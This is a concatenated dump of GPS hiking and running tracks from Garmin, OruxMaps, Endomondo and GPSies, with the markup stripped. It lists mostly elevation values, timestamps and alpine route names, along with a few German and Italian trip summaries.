+2237.13 + + +2237.61 + + +2238.57 + + +2242.41 + + +2251.06 + + +2252.51 + + +2240.97 + + +2224.15 + + +2221.74 + + +2224.15 + + +2227.03 + + +2228.95 + + +2225.11 + + +2213.09 + + +2196.75 + + +2182.81 + + +2180.41 + + +2175.6 + + +2161.18 + + +2153.97 + + +2143.4 + + +2143.4 + + +2150.61 + + +2152.53 + + +2152.53 + + +2151.09 + + +2151.57 + + +2133.78 + + +2116.48 + + +2105.42 + + +2094.37 + + +2094.37 +" +" + + + + + + + +2016-01-07T12:52:21Z + + + +1644.953125 + + + +1646.3952637 + + + +1647.8371582 + + + +1645.4338379 + + + +1646.8757324 + + + +1648.317627 + + + +1646.8757324 + + + +1646.8757324 + + + +1648.7983398 + + + +1650.7209473 + + + +1657.4501953 + + + +1656.0080566 + + + +1656.0080566 + + + +1656.4887695 + + + +1657.9309082 + + + +1646.3952637 + + + +1683.4057617 + + + + +1683.4057617 + + + +1668.5053711 + + + +1701.6708984 + + + +1701.6708984 + + + +1690.6154785 + + + +1698.7868652 + + + +1684.8479004 + + + +1683.4057617 + + + +1673.3120117 + + + +1650.2404785 + + + +1656.9694824 + + + +1652.1628418 + + + +1650.2404785 + + + +1647.3564453 + + + +1649.7597656 + + + +1656.0080566 + + + +1658.8920898 + + + +1650.7209473 + + + +1655.5275879 + + + +1651.2016602 + + + +1641.5883789 + + + +1646.3952637 + + + +1649.2790527 + + + +1648.317627 + + + +1646.8757324 + + + +1645.4338379 + + + +1646.3952637 + + + +1657.9309082 + + + +1653.6049805 + + + +1653.6049805 + + + +1659.8532715 + + + +1670.9086914 + + + +1660.8149414 + + + +1650.2404785 + + + +1644.953125 + + + +1649.2790527 + + + +1651.682373 + + + +1653.6049805 + + + +1647.3564453 + + + +1649.7597656 + + + +1645.4338379 + + + +1646.8757324 + + + +1648.7983398 + + + +1651.2016602 + + + +1643.9916992 + + + +1647.8371582 + + + +1648.7983398 + + + +1643.9916992 + + + +1648.7983398 + + + +1647.3564453 + + + +1641.5883789 + +" +" + + + + + + +Garmin International + + +2015-07-21 12:30:38 + + + + + + +2018.41 + + + +2017.05 + + + +2045.26 + + + +2063.4 + + + +2072.05 + + + +2070.51 + + + +2063.29 + + + +2042.64 + + + +2013.84 + + + +2053.25 + + + +2062.0 + + + +2072.21 + + + +2078.61 + + + +2083.75 + + + +2091.93 + + + +2107.62 + + + +2111.93 + + + +2132.65 + + + +2144.54 + + + +2169.75 + + + +2185.0 + + + +2196.95 + + + +2207.75 + + + +2215.25 + + + +2217.31 + + + +2204.29 + + + +2190.42 + + + +2184.33 + + + +2176.4 + + + +2153.03 + + + +2147.69 + + + +2135.86 + + + +2161.55 + + + +2152.41 + + + +2159.94 + + + +2188.9 + + + +2188.4 + + + +2193.91 + + + +2193.54 + + + +2168.48 + + + +2160.13 + + + +2158.63 + + + +2164.61 + + + +2136.42 + + + +2158.91 + + + +2165.64 + + + +2177.49 + + + +2178.36 + + + +2187.97 + + + +2201.98 + + + +2214.58 + + + +2216.51 + + + +2221.44 + + + +2217.55 + + + +2181.69 + + + +2152.6 + + + +2135.24 + + + +2115.16 + + + +2078.9 + + + +2066.21 + + + +2057.85 + + + +2053.83 + + + +2027.15 + + + +2003.97 + + + +1998.34 + + + +1997.17 + + + +1999.0 + + + +2003.94 + + + +2006.24 + + + +2007.6 + + + +2009.3 + + + +2009.7 + + + +2012.34 + + + +2012.21 + +" +" + + + + + + +Garmin International + + + +Track 024 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +oberdorf - chänzeli + + + + + + +oberdorf - chänzeli + + + +677.1 + + +690.9 + + +696.7776636540821 + + +701.6000305770311 + + +716.9999732347839 + + +738.400071245844 + + +757.80001816337 + + +768.8000961484441 + + +812.9000361680814 + + +844.6 + + +854.3000012068463 + + +862.5998772037857 + + +872.6999770231893 + + +908.1998962628152 + + +1006.7999251606584 + + +1026.3001339289985 + + +1051.299992766893 + + +1053.9999658685513 + + +1052.7999863208722 + + +1049.9 + + +1073.3999865444541 + + +1131.4999935999283 + + +1154.599985513365 + + +1213.7999218052316 + + +1239.0114875823474 + + +1247.299919458954 + + +1251.799976033047 + + +1264.1999918516058 + + +1268.5707177862166 + + +1266.9000016826292 + + +1251.7000022947439 + + +1251.8448899204795 + + +1251.8625526648505 + + +1251.899986581288 + + +1249.9999754412095 + + +1227.1 + + +1197.3000499264044 + + +1163.999936103601 + + +1126.760194860222 + + +1078.3838787040147 + + +1075.0 + + +1052.7999863208722 + + +1014.4999793297902 + + +944.3 + + +872.6999770226315 + + +862.5998772028066 + + +854.3000012059349 + + +844.6 + + +812.9000361678721 + + +768.800096147964 + + +757.8000181624237 + + +738.4000712450057 + + +716.9999732347839 + + +701.6000305770311 + + +696.7776636540821 + + +690.9 + + +676.9 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +FInish + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +2015-04-22 14:06:51 + + + + + + +1243.12 + + + +1242.64 + + + +1243.6 + + + +1246.49 + + + +1241.2 + + + +1234.47 + + + +1231.11 + + + +1221.49 + + + +1202.75 + + + +1188.81 + + + +1183.52 + + + +1175.83 + + + +1148.91 + + + +1135.94 + + + +1136.42 + + + +1122.0 + + + +1114.79 + + + +1100.85 + + + +1088.83 + + + +1083.06 + + + +1072.49 + + + +1065.28 + + + +1064.8 + + + +1065.28 + + + +1064.8 + + + +1046.53 + + + +1040.28 + + + +1027.79 + + + +1009.04 + + + +1002.79 + + + +993.18 + + + +985.97 + + + +976.84 + + + +957.61 + + + +946.56 + + + +934.06 + + + +932.14 + + + +917.72 + + + +908.58 + + + +892.72 + + + +879.26 + + + +867.73 + + + +858.59 + + + +855.71 + + + +851.87 + + + +851.87 + + + +848.98 + + + +844.66 + + + +839.37 + + + +833.12 + + + +831.68 + + + +829.27 + + + +825.91 + + + +816.3 + + + +813.41 + + + +807.16 + + + +801.88 + + + +801.4 + +" +" + + + + + + + +BIS 1 + + + +1905.2 + + +1909.6 + + +1915.7 + + +1912.4 + + +1915.1 + + +1924.7 + + +1924.6 + + +1956.8 + + +1957.0 + + +1972.9 + + +1971.6 + + +1995.0 + + +2000.9 + + +2023.6 + + +2032.7 + + +2028.7 + + +2034.5 + + +2038.4 + + +2044.8 + + +2057.2 + + +2066.9 + + +2076.3 + + +2077.6 + + +2095.0 + + +2094.7 + + +2114.9 + + +2124.6 + + +2137.7 + + +2145.7 + + +2152.4 + + +2164.6 + + +2165.5 + + +2175.9 + + +2187.2 + + +2184.3 + + +2181.6 + + +2176.6 + + +2177.8 + + +2180.4 + + +2200.3 + + +2219.0 + + +2231.4 + + +2241.9 + + +2239.6 + + +2248.3 + + +2249.9 + + +2262.7 + + +2268.2 + + +2279.4 + + +2291.7 + + +2310.8 + + +2316.7 + + +2342.5 + + +2408.9 + + +2409.7 + + +2428.0 + + +2434.0 + + +2444.3 + + +2462.1 + + +2475.0 + + +2493.1 + + +2502.2 + + +2511.9 + + +2516.3 + + +2525.3 +" +" + + +1111nivolet ab + + + + + +OruxMaps + + + +1111nivolet ab +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: 1111nivolet ab</h2><br /><p>Startzeit: 12/11/2015 13:12</p><p>Zielzeit: 12/11/2015 15:58</p><p>Strecke: 5km (02:46)</p><p>Bewegungszeit: 01:08</p><p>Ø-Geschwindigkeit: 1,8km/h</p><p>Netto-Geschwindigkeit: 4,4km/h</p><p>Max. Geschwindigkeit: 9,6km/h</p><p>Minimale Höhe: 630m</p><p>Maximale Höhe: 1537m</p><p>Steig-Geschw.: 275,2m/h</p><p>Sink-Geschw.: -424m/h</p><p>Aufstieg: 96m</p><p>Abstieg: -991m</p><p>Steigzeit: 00:21</p><p>Sinkzeit: 02:20</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1537.88 + + + +1528.03 + + + +1527.97 + + + +1527.86 + + + +1526.62 + + + +1522.38 + + + +1495.02 + + + +1481.47 + + + +1469.04 + + + +1481.37 + + + +1476.51 + + + +1463.81 + + + +1451.13 + + + +1410.38 + + + +1381.04 + + + +1361.03 + + + +1313.5 + + + +1304.25 + + + +1298.85 + + + +1266.04 + + + +1254.9 + + + +1244.87 + + + +1238.49 + + + +1217.04 + + + +1203.26 + + + +1178.41 + + + +1170.52 + + + +1158.67 + + + +1167.93 + + + +1175.32 + + + +1133.75 + + + +1143.78 + + + +1134.75 + + + +1130.69 + + + +1119.03 + + + +1081.53 + + + +1066.13 + + + +1040.88 + + + +1031.38 + + + +989.79 + + + +972.38 + + + +958.0 + + + +974.79 + + + +951.88 + + + +918.86 + + + +916.51 + + + +913.62 + + + +901.02 + + + +872.06 + + + +836.74 + + + +820.85 + + + +770.08 + + + +760.88 + + + +751.13 + + + +723.38 + + + +692.62 + + + +687.87 + + + +682.22 + + + +659.23 + + + +633.76 + + + +631.19 + +" +" + + +Pilatus + +Monika Teusch - Community + + + + + +Pilatus + + + +1218.58191 + + +1204.08875 + + +1212.0625 + + +1226.02014 + + +1253.44275 + + +1283.72925 + + +1313.84546 + + +1321.05151 + + +1329.26367 + + +1335.9989 + + +1388.81824 + + +1399.00562 + + +1457.24719 + + +1460.63086 + + +1510.20996 + + +1505.82568 + + +1516.10547 + + +1521.5376 + + +1526.85596 + + +1528.45386 + + +1538.56934 + + +1566.05566 + + +1572.70288 + + +1598.17383 + + +1595.49902 + + +1599.05981 + + +1603.67139 + + +1606.63623 + + +1608.14404 + + +1614.42725 + + +1606.86279 + + +1607.14136 + + +1607.76416 + + +1597.0835 + + +1609.53467 + + +1608.15723 + + +1603.26685 + + +1578.29663 + + +1571.15234 + + +1559.25781 + + +1552.13379 + + +1561.44141 + + +1572.25635 + + +1585.23096 + + +1636.33814 + + +1648.32275 + + +1676.28272 + + +1681.52881 + + +1683.85327 + + +1693.48926 + + +1702.23828 + + +1736.0896 + + +1742.67993 + + +1771.89673 + + +1784.38721 + + +1800.02002 + + +1815.0061 + + +1822.08203 + + +1837.92285 + + +1847.70117 + + +1861.09424 + + +1846.5044 + + +1858.40869 + + +1862.84863 + + +1877.77832 + + +1912.42529 + + +1917.78296 + + +1950.29297 + + +1965.88574 + + +2012.53662 + + +2051.12877 + + +2051.29747 + + +2064.98594 + + +2062.61534 + + +2062.59019 + + +2057.78111 + + +2067.87671 + + +2067.88047 +" +" + + +Lance Sud de Malissard + + + + + +OruxMaps + + + +Lance Sud de Malissard +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Lance Sud de Malissard</h2><br /><p>Startzeit: 11/05/2015 10:09</p><p>Zielzeit: 11/05/2015 13:00</p><p>Strecke: 6,3km (02:51)</p><p>Bewegungszeit: 01:53</p><p>Ø-Geschwindigkeit: 2,2km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 7,1km/h</p><p>Minimale Höhe: 990m</p><p>Maximale Höhe: 2044m</p><p>Steig-Geschw.: 456,2m/h</p><p>Sink-Geschw.: -226,6m/h</p><p>Aufstieg: 1096m</p><p>Abstieg: -82m</p><p>Steigzeit: 02:24</p><p>Sinkzeit: 00:21</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1031.63 + + + +1004.55 + + + +999.8 + + + +1000.38 + + + +1009.79 + + + +1028.88 + + + +1055.41 + + + +1052.37 + + + +1057.87 + + + +1084.47 + + + +1143.38 + + + +1150.87 + + + +1159.31 + + + +1186.76 + + + +1186.38 + + + +1189.89 + + + +1189.26 + + + +1206.4 + + + +1202.35 + + + +1207.76 + + + +1210.41 + + + +1218.1 + + + +1231.88 + + + +1236.49 + + + +1238.78 + + + +1262.12 + + + +1266.01 + + + +1280.87 + + + +1308.11 + + + +1327.38 + + + +1329.38 + + + +1347.91 + + + +1364.89 + + + +1387.12 + + + +1399.1 + + + +1407.38 + + + +1417.5 + + + +1442.25 + + + +1467.76 + + + +1481.86 + + + +1484.84 + + + +1476.83 + + + +1530.32 + + + +1533.66 + + + +1559.29 + + + +1582.98 + + + +1605.9 + + + +1601.21 + + + +1628.63 + + + +1623.01 + + + +1631.88 + + + +1646.87 + + + +1672.37 + + + +1664.35 + + + +1680.23 + + + +1712.78 + + + +1737.78 + + + +1743.92 + + + +1768.71 + + + +1783.9 + + + +1800.38 + + + +1815.33 + + + +1835.11 + + + +1864.84 + + + +1883.88 + + + +1887.39 + + + +1903.38 + + + +1974.5 + + + +2010.53 + + + +2041.85 + + + +2044.38 + +" +" + + +Tourenplanung am 22. Juni 2017 + +Monika Teusch - Community + + + + + +Tourenplanung am 22. Juni 2017 + + + +2066.7063 + + +2061.34078 + + +2058.02394 + + +2090.3417 + + +2042.13588 + + +2065.58531 + + +2024.72178 + + +2033.9494 + + +2043.37738 + + +2044.95175 + + +2055.90832 + + +2077.73022 + + +2089.74576 + + +2080.17383 + + +2102.35598 + + +2108.7789 + + +2114.99212 + + +2126.86859 + + +2115.80335 + + +2102.64863 + + +2087.65003 + + +2102.94794 + + +2074.24787 + + +2056.99143 + + +2046.50171 + + +2043.80309 + + +2045.44082 + + +2038.40251 + + +2048.06772 + + +2046.31764 + + +2054.13811 + + +2054.96699 + + +2039.79748 + + +2052.96112 + + +2057.60919 + + +2063.09741 + + +2066.7 +" +" + + + + + + +Garmin International + + +2015-06-05 17:38:08 + + + + + + +1085.53 + + + +1072.03 + + + +1053.77 + + + +1040.59 + + + +1026.56 + + + +1019.9 + + + +1038.18 + + + +1051.59 + + + +1058.24 + + + +1057.29 + + + +1062.82 + + + +1069.63 + + + +1090.67 + + + +1096.51 + + + +1107.44 + + + +1120.7 + + + +1137.22 + + + +1157.41 + + + +1184.34 + + + +1200.26 + + + +1212.66 + + + +1247.14 + + + +1268.61 + + + +1279.62 + + + +1292.44 + + + +1311.18 + + + +1331.44 + + + +1350.11 + + + +1357.91 + + + +1371.36 + + + +1393.17 + + + +1408.39 + + + +1419.28 + + + +1433.42 + + + +1445.12 + + + +1458.87 + + + +1498.34 + + + +1503.25 + + + +1494.31 + + + +1459.79 + + + +1437.92 + + + +1422.54 + + + +1408.5 + + + +1393.79 + + + +1372.11 + + + +1358.29 + + + +1318.11 + + + +1307.3 + + + +1295.47 + + + +1282.03 + + + +1271.61 + + + +1254.97 + + + +1188.61 + + + +1161.8 + + + +1141.91 + + + +1121.39 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +686.0 + + + +695.0 + + + +720.0 + + + +729.0 + + + +736.0 + + + +740.0 + + + +759.0 + + + +765.0 + + + +768.0 + + + +772.0 + + + +792.0 + + + +801.0 + + + +814.0 + + + +841.0 + + + +859.0 + + + +882.0 + + + +903.0 + + + +936.0 + + + +963.0 + + + +1018.0 + + + +1052.0 + + + +1074.0 + + + +1101.0 + + + +1100.0 + + + +1106.0 + + + +1123.0 + + + +1154.0 + + + +1177.0 + + + +1200.0 + + + +1214.0 + + + +1205.0 + +" +" + + + + + + +Garmin International + + + +Lamnivatnet Pieskehaure + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +695.10546875 + + +674.05859375 + + +627.0 + + +655.98046875 + + +625.609375 + + +588.8125 + + +634.91015625 + + +654.50390625 + + +680.31640625 + + +669.6953125 + + +630.2421875 + + +633.62109375 + + +597.0625 + + +586.30859375 + + +612.04296875 + + +593.140625 + + +594.12890625 + + +592.9375 + + +588.78515625 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +queyras1 + + +queyras1_0 + + +queyras1_1 + + +queyras1_2 + + +queyras1_3 + + +queyras1_4 + + +queyras1_5 + + +queyras1_6 + + +queyras1_7 + + +queyras1_8 + + +queyras1_9 + + +queyras1_10 + + +queyras1_11 + + +queyras1_12 + + +queyras1_13 + + +queyras1_14 + + +queyras1_15 + + +queyras1_16 + + +queyras1_17 + + +queyras1_18 + + +queyras1_19 + + +queyras1_20 + + +queyras1_21 + + +queyras1_22 + + +queyras1_23 + + +queyras1_24 + + +queyras1_25 + + +queyras1_26 + + +queyras1_27 + + +queyras1_28 + + +queyras1_29 + + +queyras1_30 + + +queyras1_31 + + +queyras1_32 + + +queyras1_33 + + +queyras1_34 + + +queyras1_35 + + +queyras1_36 + + +queyras1_37 + + +queyras1_38 + + +queyras1_39 + + +queyras1_40 + + +queyras1_41 + + +queyras1_42 + + +queyras1_43 + + +queyras1_44 + + +queyras1_45 + + +queyras1_46 + + +queyras1_47 + + +queyras1_48 + + +queyras1_49 + + +queyras1_50 + + +queyras1_51 + + +queyras1_52 + + +queyras1_53 + + +queyras1_54 + + +queyras1_55 + + +queyras1_56 + + +queyras1_57 + + +queyras1_58 + + +queyras1_59 + + +queyras1_60 + + +queyras1_61 + + +queyras1_62 + + +queyras1_63 + + +queyras1_64 + + +queyras1_65 + + +queyras1_66 + + +queyras1_67 + + +queyras1_68 + + +queyras1_69 + + +queyras1_70 + + +queyras1_71 + + +queyras1_72 + + +queyras1_73 + + +queyras1_74 + + +queyras1_75 + + +queyras1_76 +" +" + + +2016-09-10 08:26-via caí vedano + + + + + +OruxMaps + + + +2016-09-10 08:26-via caí vedano +<p>Orario inizio: 09/10/2016 08:26</p><p>Orario fine: 09/10/2016 15:25</p><p>Distanza: 4,5 km (06:58)</p><p>Tempo movimento: 01:08</p><p>Velocità media: 0,65 km/h</p><p>Velocità media mov.: 4 km/h</p><p>Max. Velocità: 7,36km/h</p><p>Altitudine minima: 1410 m</p><p>Altitudine massima: 1788 m</p><p>Velocità di salita: 56,9 m/h</p><p>Velocità di discesa: -391 m/h</p><p>Dislivello positivo: 346 m</p><p>Perdita di elevazione: -321 m</p><p>Tempo di salita: 06:05</p><p>Tempo di discesa: 00:49</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Non definito + + + + + +1426.87 + + + +1426.48 + + + +1441.0 + + + +1459.97 + + + +1472.19 + + + +1482.73 + + + +1487.08 + + + +1500.45 + + + +1502.24 + + + +1503.9 + + + +1538.37 + + + +1541.17 + + + +1562.07 + + + +1564.19 + + + +1590.56 + + + +1594.32 + + + +1614.76 + + + +1628.7 + + + +1628.08 + + + +1631.15 + + + +1638.19 + + + +1644.6 + + + +1659.55 + + + +1665.35 + + + +1669.01 + + + +1686.23 + + + +1690.76 + + + +1698.79 + + + +1764.23 + + + +1758.71 + + + +1743.23 + + + +1691.98 + + + +1684.87 + + + +1691.86 + + + +1686.94 + + + +1677.73 + + + +1670.01 + + + +1658.06 + + + +1639.6 + + + +1636.81 + + + +1631.85 + + + +1633.1 + + + +1628.8 + + + +1625.89 + + + +1626.1 + + + +1616.0 + + + +1610.79 + + + +1591.43 + + + +1592.01 + + + +1579.55 + + + +1580.09 + + + +1550.27 + + + +1540.1 + + + +1523.46 + + + +1511.81 + + + +1509.6 + + + +1496.5 + + + +1478.96 + + + +1465.62 + + + +1418.3 + +" +" + + + + + + +GPS dump for www.flightlog.org + + + +Track 001 + + + +1029.7 + + + +1025.8 + + + +1030.6 + + + +1024.9 + + + +1028.2 + + + +1037.4 + + + +1037.8 + + + +1044.6 + + + +1049.9 + + + +1065.2 + + + +1082.5 + + + +1087.8 + + + +1091.7 + + + +1104.2 + + + +1134.0 + + + +1134.0 + + + +1163.8 + + + +1200.3 + + + +1241.2 + + + +1264.7 + + + +1295.9 + + + +1308.0 + + + +1386.3 + + + +1406.0 + + + +1447.4 + + + +1469.9 + + + +1494.5 + + + +1525.7 + + + +1519.5 + + + +1538.7 + + + +1545.9 + + + +1558.9 + + + +1571.8 + + + +1610.3 + + + +1650.2 + + + +1656.0 + + + +1674.2 + + + +1695.4 + + + +1726.6 + + + +1740.6 + + + +1764.6 + + + +1771.8 + + + +1832.8 + + + +1886.7 + + + +1909.8 + + + +1930.9 + + + +2016.9 + + + +2041.5 + + + +2044.3 + + + +2060.7 + + + +2087.1 + + + +2091.9 + + + +2096.7 + + + +2115.0 + + + +2133.7 + + + +2156.8 + + + +2195.3 + + + +2219.8 + +" +" + + +D/CH Weil - Basel + + + + + + + + + +276.00000356438954 + + +276.2999992157848 + + +276.40000104973353 + + +276.5000010182585 + + +276.89225838517467 + + +278.30000251777085 + + +279.0999996539558 + + +279.10000104676334 + + +283.5 + + +283.5000011296802 + + +289.1999874540067 + + +300.9999668494059 + + +304.0999815753432 + + +308.70002483842 + + +322.399978202301 + + +331.5000410769293 + + +336.8 + + +354.8999283977306 + + +369.9000380436285 + + +396.1 + + +398.30006433837787 + + +401.7 + + +397.8000850607415 + + +393.7163349749666 + + +364.9000620863902 + + +362.7 + + +363.9999994115797 + + +362.30000728618177 + + +360.00367015747196 + + +357.0486246836695 + + +352.7 + + +343.00006228453356 + + +319.2000488971958 + + +316.1 + + +298.6000615216472 + + +287.8000029578497 + + +273.79997919589795 + + +272.09999923006706 + + +271.3 + + +266.39999879391485 + + +263.90000202948517 + + +260.3000039345421 + + +261.09999663803626 + + +260.000000171576 + + +258.300002625911 + + +258.70000360829204 + + +257.5999939721734 + + +256.2 + + +256.20000003929806 + + +256.29999921042366 + + +255.59999888758094 + + +255.99999379645556 + + +254.55062702104274 + + +253.8000020422218 + + +253.3999969955726 + + +252.9997155537673 + + +252.8000011961258 + + +252.87620552689603 + + +252.89999972892178 + + +252.9 + + +252.9738568882665 + + +253.59999940853794 +" +" + + + +Eric Fuemm + + + + +Endomondo + + +http://www.endomondo.com/ + +endomondo +RUNNING + + + + + +400.0 + + + +388.0 + + + +380.0 + + + +385.0 + + + +388.0 + + + +391.0 + + + +407.0 + + + +450.0 + + + +472.0 + + + +470.0 + + + +439.0 + + + +452.0 + + + +454.0 + + + +493.0 + + + +485.0 + + + +512.0 + + + +487.0 + + + +479.0 + + + +461.0 + + + +617.0 + + + +603.0 + + + +664.0 + + + +661.0 + + + +697.0 + + + +694.0 + + + +720.0 + + + +743.0 + + + +797.0 + + + +834.0 + + + +829.0 + + + +835.0 + + + +841.0 + + + +902.0 + + + + + + + + + + +892.0 + + + +849.0 + + + +830.0 + + + +837.0 + + + +825.0 + + + +808.0 + + + +762.0 + + + +767.0 + + + +763.0 + + + +733.0 + + + +718.0 + + + +698.0 + + + +670.0 + + + +629.0 + + + +619.0 + + + +594.0 + + + +564.0 + + + +555.0 + + + +541.0 + + + +527.0 + + + +498.0 + + + +479.0 + + + +472.0 + + + +467.0 + + + +429.0 + + + +419.0 + + + +415.0 + + + +391.0 + + + +402.0 + + + +407.0 + + + + + + + + +" +" + + +mulhacen ab + + + + + +OruxMaps + + + +mulhacen ab +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: mulhacen ab</h2><br /><p>Startzeit: 10/02/2015 13:20</p><p>Zielzeit: 10/02/2015 15:18</p><p>Strecke: 5km (01:58)</p><p>Bewegungszeit: 01:31</p><p>Ø-Geschwindigkeit: 2,5km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 6km/h</p><p>Minimale Höhe: 2675m</p><p>Maximale Höhe: 3470m</p><p>Steig-Geschw.: 144,4m/h</p><p>Sink-Geschw.: -404,8m/h</p><p>Aufstieg: 2m</p><p>Abstieg: -690m</p><p>Steigzeit: 00:00</p><p>Sinkzeit: 01:42</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +3470.79 + + + +3459.04 + + + +3412.79 + + + +3406.81 + + + +3399.92 + + + +3393.3 + + + +3374.93 + + + +3371.8 + + + +3370.7 + + + +3362.29 + + + +3343.92 + + + +3314.79 + + + +3298.79 + + + +3187.78 + + + +3172.82 + + + +3163.68 + + + +3141.32 + + + +3126.45 + + + +3049.23 + + + +3025.8 + + + +2992.82 + + + +2970.89 + + + +2966.2 + + + +2961.94 + + + +2946.28 + + + +2941.73 + + + +2896.3 + + + +2882.79 + + + +2866.81 + + + +2837.88 + + + +2825.82 + + + +2800.79 + + + +2794.29 + + + +2750.82 + + + +2725.27 + + + +2706.79 + + + +2678.39 + +" +" + + + + + + + + + + +594.599975585938 + + + +613.599975585938 + + + +622.599975585938 + + + +640.200012207031 + + + +663.400024414062 + + + +687.599975585938 + + + +711.0 + + + +722.400024414062 + + + +728.0 + + + +752.0 + + + +752.599975585938 + + + +766.799987792969 + + + +808.200012207031 + + + +813.200012207031 + + + +856.799987792969 + + + +911.599975585938 + + + +933.200012207031 + + + +958.200012207031 + + + +976.799987792969 + + + +997.0 + + + +1008.59997558594 + + + +1015.0 + + + +1024.80004882812 + + + +1040.80004882812 + + + +1077.0 + + + +1111.19995117188 + + + +1151.0 + + + +1165.59997558594 + + + +1183.40002441406 + + + +1203.0 + + + +1220.80004882812 + + + +1236.19995117188 + + + +1250.59997558594 + + + +1266.80004882812 + + + +1276.0 + + + +1284.80004882812 + + + +1303.80004882812 + + + +1320.0 + + + +1331.40002441406 + + + +1382.80004882812 + + + +1413.19995117188 + + + +1424.40002441406 + + + +1442.0 + +" +" + + + + + + +Garmin International + + + +2017-08-25_Aufstieg_Biwak + + + + + + + + +2061.68 + + + +2048.71 + + + +2058.32 + + + +2094.85 + + + +2106.39 + + + +2134.26 + + + +2141.47 + + + +2147.72 + + + +2149.16 + + + +2156.86 + + + +2153.01 + + + +2152.53 + + + +2152.05 + + + +2156.86 + + + +2154.45 + + + +2153.97 + + + +2156.37 + + + +2158.78 + + + +2169.83 + + + +2187.14 + + + +2195.79 + + + +2211.17 + + + +2219.82 + + + +2224.15 + + + +2239.53 + + + +2287.11 + + + +2295.77 + + + +2315.95 + + + +2337.58 + + + +2373.15 + + + +2402.95 + + + +2424.58 + + + +2453.42 + + + +2464.96 + + + +2486.59 + + + +2504.37 + + + +2530.33 + + + +2549.07 + + + +2551.0 + + + +2553.88 + + + +2555.8 + + + +2551.48 + +" +" + + + + + + +Garmin International + + + +Traccia corrente: 10 NOV 2016 09:04 + + + + + + +362.55 + + + +397.64 + + + +401.01 + + + +426.96 + + + +470.22 + + + +488.01 + + + +499.54 + + + +499.54 + + + +514.44 + + + +525.02 + + + +537.03 + + + +541.36 + + + +543.28 + + + +543.28 + + + +542.8 + + + +569.72 + + + +571.16 + + + +572.12 + + + +574.04 + + + +571.16 + + + +569.72 + + + +561.55 + + + +537.99 + + + +517.81 + + + +534.63 + + + +464.93 + + + +448.11 + + + +426.48 + + + +419.27 + + + +412.54 + + + +391.87 + + + +390.91 + + + +390.43 + + + +377.94 + +" +" + + + + + + +Garmin Connect + + +Borgio Wandern +Zustieg zum Klettergarten Rocce dell'Orera + + + +255.39999389648438 + + + + + + +247.60000610351562 + + + + + + +244.39999389648438 + + + + + + +234.1999969482422 + + + + + + +223.60000610351562 + + + + + + +203.60000610351562 + + + + + + +184.39999389648438 + + + + + + +124.19999694824219 + + + + + + +103.80000305175781 + + + + + + +88.19999694824219 + + + + + + +69.80000305175781 + + + + + + +60.0 + + + + + + +46.400001525878906 + + + + + + +30.200000762939453 + + + + + + +15.0 + + + + + + +12.399999618530273 + + + + + + +13.0 + + + + + + +11.600000381469727 + + + + + + +12.0 + + + + + + +11.0 + + + + + + +11.800000190734863 + + + + + + +12.0 + + + + + + +12.0 + + + + + + +12.399999618530273 + + + + + + +15.199999809265137 + + + + + " +" + + + + + + +Garmin International + + +2014-09-23 20:24:57 + + + + + + +920.22 + + + +921.46 + + + +933.7 + + + +950.17 + + + +975.22 + + + +990.89 + + + +1008.68 + + + +1014.12 + + + +1023.26 + + + +1040.17 + + + +1048.75 + + + +1054.14 + + + +1060.6 + + + +1066.9 + + + +1075.2 + + + +1085.53 + + + +1096.06 + + + +1147.85 + + + +1153.78 + + + +1158.03 + + + +1174.23 + + + +1189.02 + + + +1200.86 + + + +1213.54 + + + +1236.61 + + + +1248.32 + + + +1277.41 + + + +1290.38 + + + +1309.03 + + + +1310.12 + + + +1331.79 + + + +1333.7 + + + +1374.24 + + + +1483.12 + + + +1509.89 + + + +1481.23 + + + +1457.53 + + + +1451.17 + + + +1387.93 + + + +1347.68 + + + +1314.09 + + + +1299.99 + + + +1275.12 + + + +1268.78 + + + +1242.94 + + + +1221.89 + + + +1193.5 + + + +1169.27 + + + +1156.62 + + + +1148.09 + + + +1135.5 + + + +1096.6 + + + +1084.51 + + + +1081.24 + + + +1081.06 + + + +1080.97 + + + +1060.38 + + + +1055.49 + + + +1047.29 + + + +1027.13 + + + +1021.29 + + + +1014.85 + + + +988.98 + + + +962.96 + + + +944.3 + + + +924.57 + + + +922.09 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +30-APR-17 11:12:02 + + + + + +439.94 + + + +448.11 + + + +447.15 + + + +448.11 + + + +448.59 + + + +448.59 + + + +449.07 + + + 